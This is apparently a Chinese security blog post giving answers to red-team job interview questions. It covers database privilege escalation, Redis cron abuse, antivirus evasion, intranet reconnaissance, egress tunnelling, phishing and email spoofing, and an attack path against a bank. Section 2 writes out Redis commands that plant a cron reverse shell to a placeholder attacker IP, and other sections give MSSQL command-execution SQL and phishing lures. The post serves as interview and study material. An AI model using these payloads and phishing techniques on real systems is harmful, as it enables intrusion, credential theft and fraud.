安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
青藤云[校招]红队攻防岗
1. 数据库提权
2. Redis计划任务提权
3. 绕过杀软执行数据库命令
4. SQL Server提权方式
5. 内网信息收集
6. 免杀常见方式
7. Spring信息泄露与利用
8. 所有协议不出网的解决方案
9. ICMP出网利用方式
10. 判断出网方式
11. 邮件伪造与钓鱼技巧
12. 银行渗透思路
13. 获取RDP凭证
14. Shiro Key未知的利用思路
15. 邮件伪造绕过方案
青藤云[校招]红队攻防岗
1. 说说数据库提权 2. redis的计划任务 3. 数据库提权,执行命令的时候遇到杀软咋办。 4. sqlserver提权的方式。 5. 内网如何进行信息收集。 6. 免杀的常见方式。 7. spring信息泄漏、其他利用方式。 8. 如果所有协议都不出网咋办? 9. icmp出网方式的利用。 10. 如何判断出网方式。 11. 邮件伪造、钓鱼的方式。 12. 面对一家银行有什么渗透思路。 13. 如何获取其他登陆主机的rdp凭证。 14. shiro找不到key,有什么思路。 15. 邮件伪造如何绕过。1. 数据库提权
核心方式与示例:
- MySQL:
- UDF提权:上传恶意SO/DLL文件到
plugin_dir,注册函数执行命令(需secure_file_priv为空)。- 日志写入WebShell:通过
general_log将代码写入Web目录。- MSSQL:
- xp_cmdshell:启用后执行系统命令(
EXEC sp_configure 'xp_cmdshell',1)。- CLR集成:加载恶意DLL调用PowerShell。
- PostgreSQL:
- COPY命令写文件:导出Payload到
/var/www/html/shell.php。- CVE-2019-9193:利用
COPY FROM PROGRAM执行命令。- Redis:
- 计划任务:写入
/var/spool/cron/root(Linux)或启动项(Windows)。
2. Redis计划任务提权
利用流程:
- 连接Redis:
redis-cli -h 目标IP。- 写入定时任务:
bashconfig set dir /var/spool/cron/ config set dbfilename root set x "\n* * * * * bash -i >& /dev/tcp/攻击IP/端口 0>&1\n" save限制条
- Redis需以root权限运行。
- 目标系统定时任务目录可写(如CentOS的
/var/spool/cron/)。
3. 绕过杀软执行数据库命令
对抗方案:
- 无文件执行:通过内存加载恶意代码(如PowerShell
IEX)。- 混淆加密:
- 对命令Base64编码:
echo 'whoami' | base64→d2hvYW1pCg==。- 使用AES加密Shellcode。
- 合法进程注入:
- MSSQL调用
rundll32.exe加载合法DLL。- MySQL通过
sys_exec调用系统工具(如certutil下载文件)。
4. SQL Server提权方式
常见方法:
- xp_cmdshell:默认禁用,需启用(
EXEC sp_configure 'show advanced options',1)。- OLE自动化:
sqlDECLARE @shell INT; EXEC sp_oacreate 'WScript.Shell',@shell OUTPUT; EXEC sp_oamethod @shell,'Run',NULL,'cmd /c whoami';- CLR集成:
- 编译恶意C# DLL,通过
CREATE ASSEMBLY加载。- 注册表操作:
- 利用
xp_regwrite添加启动项或修改服务路径。
5. 内网信息收集
关键步骤:
- 主机发现:
- ARP扫描(
arp-scan -l)、ICMP探测(fping -g 网段)。- 端口与服务识别:
- 使用
nmap -sV识别服务版本,crackmapexec扫描SMB/WinRM。- 凭证获取:
- 内存抓取(Mimikatz)、配置文件泄露(Tomcat
web.xml)。- 域渗透:
- BloodHound分析域关系,Kerberoasting攻击SPN账户。
6. 免杀常见方式
分类与示例:
- 静态免杀:
- 代码混淆:VBA宏使用
StrReverse隐藏字符串。- 合法签名:劫持带有微软签名的进程(如
msbuild.exe)。- 动态免杀:
- 进程空洞:通过
Process Hollowing注入到合法进程。- 反射加载:PowerShell内存加载恶意DLL。
- 流量伪装:
- 使用DNS隧道(如
dnscat2)或HTTPS加密通信。
7. Spring信息泄露与利用
漏洞场景:
- 敏感端点:
/actuator/env泄露数据库密码,/actuator/heapdump分析内存数据。- 配置错误:
spring.cloud.gateway.routes未过滤,导致路由注入。- 表达式注入:
- Thymeleaf模板中
${T(Runtime).exec('calc')}执行命令。- JDBC利用:
- 通过H2数据库的
CREATE ALIAS创建Java函数执行代码。
8. 所有协议不出网的解决方案
突破思路:
- DNS隧道:将数据封装在DNS查询中(工具:
dnscat2)。- ICMP隧道:利用
icmpsh或pingtunnel传输数据。- 物理接触:通过USB设备或恶意硬件(如橡皮鸭)横向移动。
- 第三方服务中转:利用云存储(如AWS S3)传递数据。
9. ICMP出网利用方式
工具与技巧:
- icmpsh:
- 攻击端:
./icmpsh_m.py 攻击IP 目标IP。- 目标端:执行生成的Shellcode。
- 数据封装:将TCP流量封装到ICMP包中(需root权限)。
- 绕过检测:
- 限制ICMP包大小,使用加密避免特征检测。
10. 判断出网方式
探测方法:
- 端口测试:
curl http://攻击IP:80(检测HTTP出网)。nslookup 攻击域名(检测DNS出网)。- 协议探测:
- 使用
nc -zv 攻击IP 443测试HTTPS。- 通过PowerShell
Test-NetConnection检测ICMP/TCP。
11. 邮件伪造与钓鱼技巧
技术手段:
- SPF/DKIM绕过:
- 使用相似域名(如
paypa1.com)或免费邮箱服务(Gmail)。- HTML欺骗:
- 隐藏真实链接:
<a href="恶意URL">点击领取奖励</a>。- 附件利用:
- 携带恶意宏的Excel文件(伪装成“工资表.xlsm”)。
- 话术设计:
- 冒充IT部门:“系统升级,请重新登录验证”。
12. 银行渗透思路
攻击路径:
- 信息收集:
- 子域名爆破(如online-banking.xxx.com )、员工邮箱搜集。
- 漏洞利用:
- Web漏洞:SQL注入转账接口、XSS劫持会话。
- 内部系统:ATM网络暴露、SWIFT系统弱口令。
- 横向移动:
- 通过VPN漏洞进入内网,窃取数据库备份或加密机密钥。
13. 获取RDP凭证
方法与工具:
- Mimikatz:抓取内存中的明文密码或Hash。
- 注册表提取:
- 导出
HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers中的IP和用户名。- 流量嗅探:
- 使用Wireshark捕获RDP协议流量,解密NLA(Network Level Authentication)。
14. Shiro Key未知的利用思路
绕过方案:
- 密钥爆破:使用更大字典(如Shiro-550/721常见Key列表)。
- 反序列化链:利用CommonsBeanutils或CC链绕过加密。
- 权限绕过:
- 利用URL路径标准化(如
/;/admin)绕过鉴权。
15. 邮件伪造绕过方案
技术细节:
- SPF宽松策略:
- 目标域SPF设置为
~all(软失败)时,伪造发件人。- 中继服务器:
- 利用配置错误的邮件服务器(开放Open Relay)转发邮件。
- 附件混淆:
- 使用双重扩展名(如
document.pdf.exe)诱骗点击。
